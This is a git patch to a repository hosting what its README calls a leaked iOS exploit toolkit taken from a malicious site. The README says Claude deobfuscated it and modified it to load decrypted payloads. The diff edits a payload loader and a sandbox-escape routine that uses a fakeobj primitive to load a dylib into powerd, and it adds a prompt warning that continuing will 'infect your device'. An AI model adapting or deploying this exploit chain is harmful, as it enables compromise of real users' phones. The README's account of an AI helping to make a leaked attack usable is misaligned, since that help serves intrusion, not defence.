From cf579abf20d553a0dda6d3ace7878239a00d13bb Mon Sep 17 00:00:00 2001 From: khanhduytran0 Date: Sun, 8 Mar 2026 07:14:53 +0700 Subject: [PATCH] Add confirm dialog back --- README.md | 2 +- Stage3_VariantB.js | 19 ++++++++++++++++--- group.html | 4 ++-- 3 files changed, 19 insertions(+), 6 deletions(-) diff --git a/README.md b/README.md index 3e4e92d..c12941d 100644 --- a/README.md +++ b/README.md @@ -2,7 +2,7 @@ The leaked exploit toolkit for various iOS versions. Extracted from `https://sadjd.mijieqi[.]cn/group.html` -Partially deobfuscated and symbolicated by Claude (thanks @34306 for sponsor) and by hand. +Partially deobfuscated, symbolicated, and modified to load decrypted payloads by Claude (thanks @34306 for sponsor) and by hand. These scripts are modified in a way that allows you to host them locally. Note that this only includes exploit chains for tested devices. diff --git a/Stage3_VariantB.js b/Stage3_VariantB.js index 17f81d0..886672d 100644 --- a/Stage3_VariantB.js +++ b/Stage3_VariantB.js @@ -1160,6 +1160,7 @@ function YA() {/* Original: YA → resolveSymbols */ }, // Fetch a single file as ArrayBuffer fetchBin(url) { + window.log("Downloading " + url); return new Promise((resolve, reject) => { const xhr = new XMLHttpRequest(); xhr.open("GET", url, true); @@ -1244,6 +1245,18 @@ function YA() {/* Original: YA → resolveSymbols */ if (lastSlash >= 0) hashName = hashName.substring(lastSlash + 1); hashName = hashName.replace(/\.min\.js$/, "").replace(/\.js$/, ""); + // When we load the metadata, ask user if they want to continue (will infect device) + if (hashName === "7a7d99099b035b2c6512b6ebeeea6df1ede70fbb") { + let shouldContinue = confirm( + "The script is about to load metadata and subsequent payloads to infect your device in `powerd` process.\n" + + "Cancel = safely STOP this operation\n" + + "OK = continue infect your device"); + if (!shouldContinue) { + window.log("[LOADER] Execution canceled by user."); + return; + } + } + // Fetch decrypted F00DBEEF container from payloads/ directory window.log("[LOADER] Loading payload: " + hashName); const container = await E.buildContainer(hashName); @@ -1368,7 +1381,7 @@ function executeSandboxEscape() {/* Original: yA → executeSandboxEscape */ for (let _i = 0; _i < _buf.length; _i += 2) _oA += String.fromCharCode(_buf[_i] | ((_buf[_i + 1] || 0) << 8)); g.oA = _oA; - window.log("[PATCH] Loaded dylib: " + _buf.length + "B, oA=" + _oA.length + + window.log("[PATCH] Loaded bootstrap.dylib: " + _buf.length + "B, oA=" + _oA.length + " (orig " + _origLen + "), _process=0x" + _processOff.toString(16)); // ── END PATCH (redirect applied after buffer is built, below) ── @@ -1393,12 +1406,12 @@ function executeSandboxEscape() {/* Original: yA → executeSandboxEscape */ } else { window.log("[PATCH] _process at original offset 0x" + _ORIG_PROCESS_OFF.toString(16) + ", no redirect needed"); } - window.addDownloadBinary("lzwDecoded.dylib", new Uint32Array(dylibBuffer.slice(0))); + //window.addDownloadBinary("lzwDecoded.dylib", new Uint32Array(dylibBuffer.slice(0))); const dylibLoadAddressI64 = utilityModule.Int64.fromNumber(dylibLoadAddress), dylibDataAddressMaybe = utilityModule.Int64.fromNumber(platformModule.platformState.exploitPrimitive.fakeobj(dylibBuffer)); window.log("dylib load address: 0x" + dylibLoadAddress.toString(16)); window.log("data address?: 0x" + dylibDataAddressMaybe.toNumber().toString(16)); - window.log("D: 0x" + dylibSize); + window.log("dylib size: 0x" + dylibSize); platformModule.platformState.sandboxEscape.Ad(dylibLoadAddressI64, dylibDataAddressMaybe, dylibSize); const T = g.YA().ct() + 4; //alert("D 0x" + T.toString(16)); diff --git a/group.html b/group.html index 5ccc271..2be4caa 100644 --- a/group.html +++ b/group.html @@ -11,8 +11,8 @@ - - +